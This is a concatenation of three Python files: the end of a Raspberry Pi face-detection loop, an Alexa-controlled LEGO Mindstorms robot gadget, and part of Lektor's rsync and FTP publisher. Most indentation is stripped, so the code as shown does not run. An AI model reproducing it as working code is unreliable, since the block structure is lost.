return containFace, boundingboxes
def main():
    # A video filter (VSCO-style) is not working yet; it may be added later.
    # The idea here is to move the blocking I/O operations to a separate
    # thread and maintain a queue of decoded frames in an effort to improve
    # FPS, since the camera .read() method is a blocking I/O operation.
camera = PiCamera()
camera.resolution = (352, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(352, 240))
stream = camera.capture_continuous(rawCapture, format="bgr", use_video_port=True)
camera.close()
vs = PiVideoStream().start()
time.sleep(2.0)
fps = FPS().start()
minsize = 20
caffe_model_path = "./model"
threshold = [0.6, 0.7, 0.7] #initial threshold: 0.6 0.7 0.7
factor = 0.709
caffe.set_mode_cpu() #comment the next few lines?
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
while True:
start = timer()
print("---------------------------------------------")
frame = vs.read()
#frame = imutils.resize(frame, width=400) #do we need to do the resize?
# convert the frame to gray scale and restore the BGR info
grayFrame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
restore = cv2.cvtColor(grayFrame,cv2.COLOR_GRAY2BGR)
img = restore
#img = frame
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
# check rgb position
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
## copy img to positive folder
#if boundingboxes.shape[0] > 0 :
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/positive/'+os.path.split(imgpath)[1] )
#else:
# import shutil
# shutil.copy(imgpath, '/home/duino/Videos/3/disdata/negetive/'+os.path.split(imgpath)[1] )
img = drawBoxes(frame, boundingboxes)
cv2.imshow('cam', img)
if cv2.waitKey(1) &0xFF == ord('q'):
break
end = timer()
print ("Total time:",end-start)
fps.update()
#When everything's done, release capture
#cap.release()
cv2.destroyAllWindows()
vs.stop()
vs.update()
if __name__ == "__main__":
main()
|
lego.py
|
import time
import logging
import json
import random
import threading
import math
from enum import Enum
from time import sleep
from agt import AlexaGadget
from ev3dev2.led import Leds
from ev3dev2.sound import Sound
from ev3dev2.motor import LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, MoveTank, SpeedPercent, MediumMotor
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from ev3dev2.display import *
from PIL import Image
# Set the logging level to INFO to see messages from AlexaGadget
logging.basicConfig(level=logging.INFO)
class EventName(Enum):
"""
    The list of custom event names sent from this gadget
"""
SETSPEED = "SetSpeed"
SETTARGET = "SetTarget"
FINDCOLOR = "FindColor"
REMOTECONTROL = "RemoteControl"
HOMEBUTTON = "HomeButton"
class MindstormsGadget(AlexaGadget):
'''
A Mindstorms gadget that can perform bi-directional interaction with an Alexa skill.
'''
def __init__(self):
'''
Performs Alexa Gadget initialization routines and ev3dev resource allocation.
'''
super().__init__()
# Robot position and dimensions
self.x = 0.0
self.y = 0.0
self.orientation = 0.0
        self.wheelRadius = 16.8  # millimeters
self.distanceWheels = 100.0
# Places defined in the field
self.toPlaces = {
'home': [1.0,1.0,0.0],
'homeEntrance': [300.0, 1.0, 0.0],
'parking': [800.0, 200.0, 3*math.pi/4],
'trainstation': [980.0, 1.0, math.pi],
'heliport': [450.0, 230.0, 3*math.pi/2],
'port': [1.0, 490.0, 7*math.pi/4],
'colorsLineStart': [100.0, 580.0, 0.0],
'colorsLineEnd': [800.0, 580.0, math.pi]
}
# Positions of the different targets
self.targets = {
'plane': [1000.0,500.0],
'boat': [-100.0, 500.0],
'tree': [450.0, -100.0],
'tractor': [1050.0, 200.0]
}
# Lego motors, leds, sound, sensors, display
self.drive = MoveTank(OUTPUT_B, OUTPUT_C)
self.weapon = MediumMotor(OUTPUT_A)
self.sound = Sound()
self.leds = Leds()
self.ir = InfraredSensor()
self.ts = TouchSensor()
self.lcd = Display()
self.cs = ColorSensor()
self.cs.mode = self.cs.MODE_COL_COLOR
self.left_motor = LargeMotor(OUTPUT_B)
self.right_motor = LargeMotor(OUTPUT_C)
self.ir.on_channel1_top_left = self.remote_move(self.left_motor, 800)
self.ir.on_channel1_bottom_left = self.remote_move(self.left_motor, -800)
self.ir.on_channel1_top_right = self.remote_move(self.right_motor, 800)
self.ir.on_channel1_bottom_right = self.remote_move(self.right_motor, -800)
self.ir.on_channel2_top_left = self.remote_useTool()
self.ir.on_channel2_top_right = self.remote_useTool()
self.ir.on_channel4_beacon = self.beacon_activation()
# Default values
self.tool = 'gun'
self.picker = 'pick'
self.speed = 50
self.color = ''
self.detectedColor = 'none'
self.beacon = False
self.target = 'none'
self.findColorOn = False
self.ColorFound = False
self.targetColor = ''
self.fromPlace = 'home'
self.toPlace = 'home'
self.remoteDirection = 'forward'
self.remoteControl = False
self.show_image('Pinch left.bmp', 1)
self.show_image('Pinch middle.bmp', 1)
self.show_image('Pinch right.bmp', 1)
self.show_image('Awake.bmp',0)
self.sound.speak('Lego robot, ready for action')
# Start threads for remote control, color sensor and touch sensor management
threading.Thread(target=self._remote_control, daemon=True).start()
threading.Thread(target=self._find_color, daemon=True).start()
threading.Thread(target=self._touch_sensor, daemon=True).start()
def on_connected(self, device_addr):
'''
Gadget connected to the paired Echo device.
:param device_addr: the address of the device we connected to
'''
self.leds.set_color('LEFT', 'GREEN')
self.leds.set_color('RIGHT', 'GREEN')
print('{} connected to Echo device'.format(self.friendly_name))
def on_disconnected(self, device_addr):
'''
Gadget disconnected from the paired Echo device.
:param device_addr: the address of the device we disconnected from
'''
self.leds.set_color('LEFT', 'BLACK')
self.leds.set_color('RIGHT', 'BLACK')
print('{} disconnected from Echo device'.format(self.friendly_name))
def on_custom_mindstorms_gadget_control(self, directive):
'''
Handles the Custom.Mindstorms.Gadget control directive.
:param directive: the custom directive with the matching namespace and name
'''
try:
payload = json.loads(directive.payload.decode('utf-8'))
print('Control payload: {}'.format(payload))
control_type = payload['type']
self.ColorFound = False
if control_type == 'changeTool':
self.show_image('Medium motor.bmp', 1)
self.show_image('Wink.bmp', 0)
self.tool = payload['tool']
elif control_type == 'useTool':
self.show_image('Boom.bmp', 1)
self.tool = payload['tool']
self.useTool()
elif control_type == 'notRightTool':
self.show_image('Sick.bmp', 1)
self.show_image('Question mark.bmp', 0)
elif control_type == 'goSomewhere':
self.show_image('Accept.bmp', 1)
self.show_image('Lightning.bmp', 0)
self.toPlace = payload['place']
self.speed = payload['speed']
if self.toPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, self.speed)
elif self.fromPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, self.speed)
else:
self.goSomewhere(self.toPlace, self.speed)
elif control_type == 'alreadyThere':
self.show_image('Knocked out.bmp', 1)
elif control_type == 'findColor':
self.show_image('Dizzy.bmp', 1)
self.show_image('Color sensor.bmp', 0)
self.color = payload['color']
self.speed = payload['speed']
self.findColor(self.color, self.speed)
elif control_type == 'setSpeed':
self.speed = payload['speed']
self.sound.play_file('./sounds/Blip.wav')
if (self.speed == 100):
self.show_image('Dial 4.bmp', 0)
if (self.speed == 50):
self.show_image('Dial 2.bmp', 0)
if (self.speed == 20):
self.show_image('Dial 0.bmp', 0)
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETSPEED, {'speed': self.speed})
elif control_type == 'setTarget':
self.sound.play_file('./sounds/Blip.wav')
self.show_image('Target.bmp', 0)
self.target = payload['target']
print("target = {}".format(self.target))
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETTARGET, {'target': self.target})
elif control_type == 'moveRemote':
self.remoteControl = True
self.show_image('EV3 icon.bmp', 0)
self.remoteDirection = payload['direction']
if self.remoteDirection == 'forward':
self.move(100)
elif self.remoteDirection == 'backward':
self.speed = 0 - self.speed
self.move(100)
self.speed = 0 - self.speed
elif self.remoteDirection == 'left':
self.turn(math.pi/2)
elif self.remoteDirection == 'right':
self.turn(-math.pi/2)
# Send event from EV3 gadget to Alexa
self._send_event(EventName.SETTARGET, {'target': self.target})
elif control_type == 'noPositionKnown':
self.show_image('Touch sensor.bmp', 0)
elif control_type == 'alexaTalk':
self.show_image('Dizzy.bmp', 0)
else:
self.show_image('Question mark.bmp', 0)
except KeyError:
print('Missing expected parameters: {}'.format(directive))
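    # Illustrative examples (hypothetical values, not taken from the skill):
    # the decoded payload is plain JSON keyed by 'type', e.g.
    #
    #   {"type": "goSomewhere", "place": "heliport", "speed": 50}
    #   {"type": "setSpeed", "speed": 20}
    #   {"type": "useTool", "tool": "hammer"}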
def goSomewhere(self, toPlace, speed):
coordinates = self.toPlaces[toPlace]
finalX = coordinates[0]
finalY = coordinates[1]
finalOrientation = coordinates[2]
journeyX = finalX - self.x
journeyY = finalY - self.y
#distance between initial and final point
journeyDistance = math.hypot(journeyX,journeyY)
#direction to get there
journeyDirection = self.calculateJourneyDirection(journeyX, journeyY)
turnJourneyDirection = journeyDirection - self.orientation
        # If the robot is coming back to the home position, move backwards from homeEntrance
if ((self.fromPlace == 'homeEntrance') and (self.toPlace == 'home')):
self.moveBackwards(journeyDistance)
else:
            # The robot turns to face the direction, moves the distance, and turns again once at the destination
self.turn(turnJourneyDirection)
self.move(journeyDistance)
turnFinalOrientation = finalOrientation - journeyDirection
self.turn(turnFinalOrientation)
# Record the final position and orientation
self.setPosition(finalX, finalY, finalOrientation)
self.fromPlace = toPlace
    def calculateJourneyDirection(self, journeyX, journeyY):
        # atan2 covers all quadrants and avoids the division by zero that
        # atan(journeyY/journeyX) would hit when journeyX is exactly 0
        direction = math.atan2(journeyY, journeyX)
        if direction < 0:
            direction += 2*math.pi
        return direction
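    # Worked example (illustrative): from (0, 0) towards (100, 100) the
    # direction is pi/4; towards (-100, 0) it is pi; towards (0, -100) it is
    # -pi/2, normalised here to 3*pi/2.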
def turn(self, angle):
if angle > math.pi:
angle = angle - 2*math.pi
elif angle < -math.pi:
angle = angle + 2*math.pi
degrees = (360 * self.distanceWheels * angle) / (2 * math.pi * self.wheelRadius)
if self.ColorFound == False:
self.drive.on_for_degrees(SpeedPercent(self.speed), SpeedPercent(-self.speed), degrees, block=True)
def move(self, distance):
degrees = (360 * distance) / (2 * math.pi * self.wheelRadius)
self.drive.on_for_degrees(SpeedPercent(self.speed), SpeedPercent(self.speed), degrees, block=True)
def moveBackwards(self, distance):
degrees = (360 * distance) / (2 * math.pi * self.wheelRadius)
self.drive.on_for_degrees(SpeedPercent(-self.speed), SpeedPercent(-self.speed), degrees, block=True)
def setPosition(self, newX, newY, newOrientation):
if newOrientation < 0:
newOrientation += 2 * math.pi
elif newOrientation >= 2 * math.pi:
newOrientation -= 2 * math.pi
self.x = float(newX)
self.y = float(newY)
self.orientation = float(newOrientation)
def findColor(self, color, speed):
        # Move to the colorsLineStart position to start scanning colors. If the starting position is home, go to homeEntrance first
self.toPlace = 'colorsLineStart'
if self.fromPlace == 'home':
self.goSomewhere('homeEntrance', self.speed)
self.goSomewhere(self.toPlace, speed)
self.targetColor = color
self.findColorOn = True
time.sleep(2)
if self.findColorOn == True:
self.toPlace = 'colorsLineEnd'
self.goSomewhere(self.toPlace, 30)
# Send event from EV3 gadget to Alexa
if self.ColorFound == False:
self._send_event(EventName.FINDCOLOR, {'color': "none"})
def useTool(self):
# Robot turns to face the target and depending on the weapon it has it moves closer to the specified target
self.faceTarget()
self.sound.play_file('./sounds/Laser.wav')
if (self.tool == 'gun'):
self.weapon.on_for_degrees(SpeedPercent(100), 1000)
elif (self.tool == 'hammer'):
self.weapon.on_for_degrees(SpeedPercent(100), 200)
self.weapon.on_for_degrees(SpeedPercent(-50), 200)
elif (self.tool == 'picker'):
            # Check whether the picker is open, to close it, and the other way around
if (self.picker == 'pick'):
self.weapon.on_for_degrees(SpeedPercent(100), 90)
self.picker = 'leave'
elif (self.picker == 'leave'):
self.weapon.on_for_degrees(SpeedPercent(-100), 90)
self.picker = 'pick'
elif (self.tool == 'blade'):
self.weapon.on_for_degrees(SpeedPercent(100), 360)
self.weapon.on_for_degrees(SpeedPercent(-100), 360)
def faceTarget(self):
if ((self.target != 'none') and (self.remoteControl == False)):
# Robot turns to face the target and move depending on the tool
            print("facing target")
coordinates = self.targets[self.target]
targetX = coordinates[0]
targetY = coordinates[1]
directionX = targetX - self.x
directionY = targetY - self.y
# Turning to direction to face the target
direction = self.calculateJourneyDirection(directionX, directionY)
turnDirection = direction - self.orientation
self.turn(turnDirection)
# Calculate the distance to move with an offset depending on the weapon the robot has
distance = math.hypot(directionX,directionY)
if (self.tool == 'gun'):
offset = distance
if (self.tool == 'hammer'):
offset = 130
if (self.tool == 'blade'):
offset = 80
if (self.tool == 'picker'):
offset = 80
self.move(distance-offset)
# Record the final position and orientation
finalX = targetX - offset* math.cos(direction)
finalY = targetY - offset * math.sin(direction)
self.setPosition(finalX, finalY, direction)
elif (self.target == 'mobile'):
# Send event from EV3 gadget to Alexa as we will not track the position of the robot
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
heading = self.ir.heading(4)
turnDirection = math.radians(heading) + math.pi # We add pi because the IR is pointing backwards
            infraredDistance = 7  # 700 millimeters / 100 (max percentage value of the IR distance reading)
distance = infraredDistance * self.ir.distance(4)
self.turn(turnDirection)
if (self.tool == 'gun'):
offset = distance
if (self.tool == 'hammer'):
offset = 130
if (self.tool == 'blade'):
offset = 80
if (self.tool == 'picker'):
offset = 80
self.move(distance-offset)
            # We cannot ensure that the IR distance really tops out at 70 cm, so we do not trust the calculated position
# finalX = self.x - (distance-offset) * math.cos(direction)
# finalY = self.y - (distance-offset) * math.sin(direction)
# self.setPosition(finalX, finalY, direction)
def show_image(self, image_name, time):
image_path = './images/'+ image_name
image = Image.open(image_path)
self.lcd.image.paste(image, (0,0))
self.lcd.update()
sleep(time)
def _send_event(self, name: EventName, payload):
'''
        Sends a custom event to the paired Alexa skill.
        :param name: the name of the custom event
        :param payload: the JSON payload of the event
'''
self.send_custom_event('Custom.Mindstorms.Gadget', name.value, payload)
def remote_move(self, motor, speed):
        # Depending on the button pressed, the corresponding motor runs for as long as the button is held
def on_press(state):
print('remote move. state = {}'.format(state))
if (self.remoteControl == False):
# Send event from EV3 gadget to Alexa
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
if state:
motor.run_forever(speed_sp=speed)
else:
motor.stop()
return on_press
def remote_useTool(self):
# We trigger the weapon if the button in the indicated channel is pressed
def on_press(state):
if (self.remoteControl == False):
# Send event from EV3 gadget to Alexa
self._send_event(EventName.REMOTECONTROL, {})
self.remoteControl = True
self.sound.play_file('./sounds/Horn.wav')
if (self.tool == 'gun'):
self.weapon.on_for_degrees(SpeedPercent(100), 1000)
elif (self.tool == 'hammer'):
self.weapon.on_for_degrees(SpeedPercent(100), 200)
self.weapon.on_for_degrees(SpeedPercent(-50), 200)
elif (self.tool == 'picker'):
if (self.picker == 'pick'):
self.weapon.on_for_degrees(SpeedPercent(100), 90)
self.picker = 'leave'
elif (self.picker == 'leave'):
self.weapon.on_for_degrees(SpeedPercent(-100), 90)
self.picker = 'pick'
elif (self.tool == 'blade'):
self.weapon.on_for_degrees(SpeedPercent(100), 360)
self.weapon.on_for_degrees(SpeedPercent(-100), 360)
return on_press
    def beacon_activation(self):
        # Return a handler (like remote_move/remote_useTool) so the assignment
        # in __init__ registers a callable; the handler records the channel 4
        # beacon state whenever it toggles
        def on_press(state):
            print("beacon activated: {}".format(state))
            self.beacon = bool(state)
        return on_press
def _remote_control(self):
        # This thread polls the infrared remote control and processes button-press events
time.sleep(3)
while True:
self.ir.process()
time.sleep(0.1)
def _touch_sensor(self):
        # This thread waits for the touch sensor; once it is pressed, the robot position is reset to home
while True:
self.ts.wait_for_pressed()
if (self.remoteControl == True):
self.sound.beep()
self.setPosition(1.0, 1.0, 0.0)
self.toPlace = 'home'
self.fromPlace = 'home'
# Send event from EV3 gadget to Alexa
self._send_event(EventName.HOMEBUTTON, {'place': "home"})
self.remoteControl = False
time.sleep(1)
def _find_color(self):
        # This thread checks whether the find-color directive is active; if so, the robot scans along the color line for the requested color
while True:
time.sleep(0.3)
while self.findColorOn:
targetColor= self.targetColor
detectedColor = self.cs.color_name # 0: No color, 1: Black, 2: Blue, 3: Green, 4: Yellow, 5: Red, 6: White, 7: Brown
if (targetColor == detectedColor):
# If the target color is detected robot sends an event to Alexa and stops
self.drive.off()
self.ColorFound = True
self.findColorOn = False
self._send_event(EventName.FINDCOLOR, {'color': detectedColor})
self.sound.play_file('./sounds/Horn.wav')
self.sound.speak('That color is here')
self.remoteControl = True
time.sleep(0.3)
if __name__ == '__main__':
# Startup sequence
gadget = MindstormsGadget()
gadget.sound.play_song((('C4', 'e'), ('D4', 'e'), ('E5', 'q')))
gadget.leds.set_color('LEFT', 'GREEN')
gadget.leds.set_color('RIGHT', 'GREEN')
# Gadget main entry point
gadget.main()
# Shutdown sequence
gadget.sound.play_song((('E5', 'e'), ('C4', 'e')))
gadget.leds.set_color('LEFT', 'BLACK')
gadget.leds.set_color('RIGHT', 'BLACK')
|
publisher.py
|
import errno
import hashlib
import os
import posixpath
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from werkzeug import urls
from lektor._compat import BytesIO
from lektor._compat import iteritems
from lektor._compat import iterkeys
from lektor._compat import PY2
from lektor._compat import queue
from lektor._compat import range_type
from lektor._compat import string_types
from lektor._compat import StringIO
from lektor._compat import text_type
from lektor.exception import LektorException
from lektor.utils import locate_executable
from lektor.utils import portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
("GIT_COMMITTER_NAME", "GIT_AUTHOR_NAME", "Lektor Bot"),
("GIT_COMMITTER_EMAIL", "GIT_AUTHOR_EMAIL", "bot@getlektor.com"),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get("GIT_SSH_COMMAND"):
env["GIT_SSH_COMMAND"] = ssh_command
return env
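# Illustrative sketch (not part of the original module; the values are made
# up): committer and author identity are mirrored, with the Lektor bot
# defaults as a fallback, and GIT_SSH_COMMAND is only set if missing:
#
#   env = _patch_git_env({"GIT_COMMITTER_NAME": "Jane"}, ssh_command="ssh -p 2222")
#   # env["GIT_AUTHOR_NAME"] == "Jane"
#   # env["GIT_COMMITTER_EMAIL"] == env["GIT_AUTHOR_EMAIL"] == "bot@getlektor.com"
#   # env["GIT_SSH_COMMAND"] == "ssh -p 2222"
#   # (assuming none of these variables were already set in os.environ)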
def _write_ssh_key_file(temp_fn, credentials):
if credentials:
key_file = credentials.get("key_file")
if key_file is not None:
return key_file
key = credentials.get("key")
if key:
parts = key.split(":", 1)
if len(parts) == 1:
kt = "RSA"
else:
kt, key = parts
with open(temp_fn, "w") as f:
f.write("-----BEGIN %s PRIVATE KEY-----\n" % kt.upper())
for x in range_type(0, len(key), 64):
f.write(key[x : x + 64] + "\n")
f.write("-----END %s PRIVATE KEY-----\n" % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append("-p %s" % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return "ssh %s" % " ".join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix=".deploytemp", dir=base)
scratch = os.path.join(folder, "scratch")
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
except (IOError, OSError):
pass
class PublishError(LektorException):
"""Raised by publishers if something goes wrong."""
class Command(object):
def __init__(self, argline, cwd=None, env=None, capture=True, silent=False):
environ = dict(os.environ)
if env:
environ.update(env)
kwargs = {"cwd": cwd, "env": environ}
if silent:
self.devnull = open(os.devnull, "rb+")
kwargs["stdout"] = self.devnull
kwargs["stderr"] = self.devnull
capture = False
if capture:
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
self.capture = capture
self._cmd = portable_popen(argline, **kwargs)
def wait(self):
returncode = self._cmd.wait()
if hasattr(self, "devnull"):
self.devnull.close()
return returncode
@property
def returncode(self):
return self._cmd.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self._cmd.wait()
def __iter__(self):
if not self.capture:
raise RuntimeError("Not capturing")
# Windows platforms do not have select() for files
if os.name == "nt":
q = queue.Queue()
def reader(stream):
while 1:
line = stream.readline()
q.put(line)
if not line:
break
t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
t1.setDaemon(True)
t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
t2.setDaemon(True)
t1.start()
t2.start()
outstanding = 2
while outstanding:
item = q.get()
if not item:
outstanding -= 1
else:
yield item.rstrip().decode("utf-8", "replace")
# Otherwise we can go with select()
else:
streams = [self._cmd.stdout, self._cmd.stderr]
while streams:
for l in select.select(streams, [], streams):
for stream in l:
line = stream.readline()
if not line:
if stream in streams:
streams.remove(stream)
break
yield line.rstrip().decode("utf-8", "replace")
def safe_iter(self):
with self:
for line in self:
yield line
@property
def output(self):
return self.safe_iter()
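# Illustrative sketch (not part of the original module): with capture enabled
# (the default), a Command can be iterated line by line, merging stdout and
# stderr; this is how the publishers below consume git/rsync output:
#
#   for line in Command(["git", "--version"]).output:
#       print(line)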
class Publisher(object):
def __init__(self, env, output_path):
self.env = env
self.output_path = os.path.abspath(output_path)
def fail(self, message):
raise PublishError(message)
def publish(self, target_url, credentials=None, **extra):
raise NotImplementedError()
class RsyncPublisher(Publisher):
def get_command(self, target_url, tempdir, credentials):
credentials = credentials or {}
argline = ["rsync", "-rclzv", "--exclude=.lektor"]
target = []
env = {}
options = target_url.decode_query()
exclude = options.getlist("exclude")
for file in exclude:
argline.extend(("--exclude", file))
delete = options.get("delete", False) in ("", "on", "yes", "true", "1", None)
if delete:
argline.append("--delete-delay")
keyfile = _write_ssh_key_file(
os.path.join(tempdir, "ssh-auth-key"), credentials
)
if target_url.port is not None or keyfile is not None:
argline.append("-e")
argline.append(_get_ssh_cmd(target_url.port, keyfile))
username = credentials.get("username") or target_url.username
if username:
target.append(username + "@")
if target_url.ascii_host is not None:
target.append(target_url.ascii_host)
target.append(":")
target.append(target_url.path.rstrip("/") + "/")
argline.append(self.output_path.rstrip("/\\") + "/")
argline.append("".join(target))
return Command(argline, env=env)
def publish(self, target_url, credentials=None, **extra):
with _temporary_folder(self.env) as tempdir:
client = self.get_command(target_url, tempdir, credentials)
with client:
for line in client:
yield line
class FtpConnection(object):
def __init__(self, url, credentials=None):
credentials = credentials or {}
self.con = self.make_connection()
self.url = url
self.username = credentials.get("username") or url.username
self.password = credentials.get("password") or url.password
self.log_buffer = []
self._known_folders = set()
def make_connection(self):
from ftplib import FTP
return FTP()
def drain_log(self):
log = self.log_buffer[:]
del self.log_buffer[:]
for chunk in log:
for line in chunk.splitlines():
if not isinstance(line, text_type):
line = line.decode("utf-8", "replace")
yield line.rstrip()
def connect(self):
options = self.url.decode_query()
log = self.log_buffer
log.append("000 Connecting to server ...")
try:
log.append(self.con.connect(self.url.ascii_host, self.url.port or 21))
except Exception as e:
log.append("000 Could not connect.")
log.append(str(e))
return False
try:
credentials = {}
if PY2:
if self.username:
credentials["user"] = self.username.encode("utf-8")
if self.password:
credentials["passwd"] = self.password.encode("utf-8")
else:
if self.username:
credentials["user"] = self.username
if self.password:
credentials["passwd"] = self.password
log.append(self.con.login(**credentials))
except Exception as e:
log.append("000 Could not authenticate.")
log.append(str(e))
return False
passive = options.get("passive") in ("on", "yes", "true", "1", None)
log.append("000 Using passive mode: %s" % (passive and "yes" or "no"))
self.con.set_pasv(passive)
try:
log.append(self.con.cwd(self.url.path))
except Exception as e:
log.append(str(e))
return False
log.append("000 Connected!")
return True
def mkdir(self, path, recursive=True):
if not isinstance(path, text_type):
path = path.decode("utf-8")
if path in self._known_folders:
return
dirname, basename = posixpath.split(path)
if dirname and recursive:
self.mkdir(dirname)
try:
self.con.mkd(path)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(str(e))
return
self._known_folders.add(path)
def append(self, filename, data):
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
if PY2:
input = StringIO(data)
else:
input = BytesIO(data.encode("utf-8"))
try:
self.con.storbinary("APPE " + filename, input)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def get_file(self, filename, out=None):
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
getvalue = False
if out is None:
if PY2:
out = StringIO()
else:
out = BytesIO()
getvalue = True
try:
self.con.retrbinary("RETR " + filename, out.write)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(e)
return None
if getvalue:
if PY2:
return out.getvalue()
return out.getvalue().decode("utf-8")
return out
def upload_file(self, filename, src, mkdir=False):
if isinstance(src, string_types):
if PY2:
src = StringIO(src)
else:
src = BytesIO(src.encode("utf-8"))
if mkdir:
directory = posixpath.dirname(filename)
if directory:
self.mkdir(directory, recursive=True)
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
try:
self.con.storbinary("STOR " + filename, src, blocksize=32768)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def rename_file(self, src, dst):
try:
self.con.rename(src, dst)
except FTPError as e:
self.log_buffer.append(str(e))
try:
self.con.delete(dst)
except Exception as e:
self.log_buffer.append(str(e))
try:
self.con.rename(src, dst)
except Exception as e:
self.log_buffer.append(str(e))
def delete_file(self, filename):
if isinstance(filename, text_type):
filename = filename.encode("utf-8")
try:
self.con.delete(filename)
except Exception as e:
self.log_buffer.append(str(e))
def delete_folder(self, filename):
if isinstance(filename, text_type):
filename = filename.encode("utf-8")
try:
self.con.rmd(filename)
except Exception as e:
self.log_buffer.append(str(e))
self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
def make_connection(self):
from ftplib import FTP_TLS
return FTP_TLS()
def connect(self):
connected = super(FtpTlsConnection, self).connect()
if connected:
# Upgrade data connection to TLS.
self.con.prot_p() # pylint: disable=no-member
return connected
class FtpPublisher(Publisher):
connection_class = FtpConnection
def read_existing_artifacts(self, con):
contents = con.get_file(".lektor/listing")
if not contents:
return {}, set()
duplicates = set()
rv = {}
# Later records override earlier ones. There can be duplicate
# entries if the file was not compressed.
for line in contents.splitlines():
items = line.split("|")
if len(items) == 2:
if not isinstance(items[0], text_type):
artifact_name = items[0].decode("utf-8")
else:
artifact_name = items[0]
if artifact_name in rv:
duplicates.add(artifact_name)
rv[artifact_name] = items[1]
return rv, duplicates
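    # Illustrative note (not part of the original module): .lektor/listing is a
    # plain text file with one "artifact|checksum" record per line, e.g.
    #
    #   index.html|<sha1 of the built file>
    #   blog/index.html|<sha1 of the built file>
    #
    # upload_artifact() appends such records; consolidate_listing() rewrites
    # the file with a single sorted entry per artifact.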
def iter_artifacts(self):
"""Iterates over all artifacts in the build folder and yields the
artifacts.
"""
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if not self.env.is_ignored_artifact(x)]
for filename in filenames:
if self.env.is_ignored_artifact(filename):
continue
full_path = os.path.join(self.output_path, dirpath, filename)
local_path = full_path[len(self.output_path) :].lstrip(os.path.sep)
if os.path.altsep:
local_path = local_path.lstrip(os.path.altsep)
h = hashlib.sha1()
try:
with open(full_path, "rb") as f:
while 1:
item = f.read(4096)
if not item:
break
h.update(item)
except IOError as e:
if e.errno != errno.ENOENT:
raise
yield (
local_path.replace(os.path.sep, "/"),
full_path,
h.hexdigest(),
)
def get_temp_filename(self, filename):
dirname, basename = posixpath.split(filename)
return posixpath.join(dirname, "." + basename + ".tmp")
def upload_artifact(self, con, artifact_name, source_file, checksum):
with open(source_file, "rb") as source:
tmp_dst = self.get_temp_filename(artifact_name)
con.log_buffer.append("000 Updating %s" % artifact_name)
con.upload_file(tmp_dst, source, mkdir=True)
con.rename_file(tmp_dst, artifact_name)
con.append(".lektor/listing", "%s|%s\n" % (artifact_name, checksum))
def consolidate_listing(self, con, current_artifacts):
server_artifacts, duplicates = self.read_existing_artifacts(con)
known_folders = set()
for artifact_name in iterkeys(current_artifacts):
known_folders.add(posixpath.dirname(artifact_name))
for artifact_name, checksum in iteritems(server_artifacts):
if artifact_name not in current_artifacts:
con.log_buffer.append("000 Deleting %s" % artifact_name)
con.delete_file(artifact_name)
folder = posixpath.dirname(artifact_name)
if folder not in known_folders:
con.log_buffer.append("000 Deleting %s" % folder)
con.delete_folder(folder)
if duplicates or server_artifacts != current_artifacts:
listing = []
for artifact_name, checksum in iteritems(current_artifacts):
listing.append("%s|%s\n" % (artifact_name, checksum))
listing.sort()
con.upload_file(".lektor/.listing.tmp", "".join(listing))
con.rename_file(".lektor/.listing.tmp", ".lektor/listing")
def publish(self, target_url, credentials=None, **extra):
con = self.connection_class(target_url, credentials)
connected = con.connect()
for event in con.drain_log():
yield event
if not connected:
return
yield "000 Reading server state ..."
con.mkdir(".lektor")
committed_artifacts, _ = self.read_existing_artifacts(con)
for event in con.drain_log():
yield event
yield "000 Begin sync ..."
current_artifacts = {}
for artifact_name, filename, checksum in self.iter_artifacts():
current_artifacts[artifact_name] = checksum
if checksum != committed_artifacts.get(artifact_name):
self.upload_artifact(con, artifact_name, filename, checksum)
for event in con.drain_log():
yield event
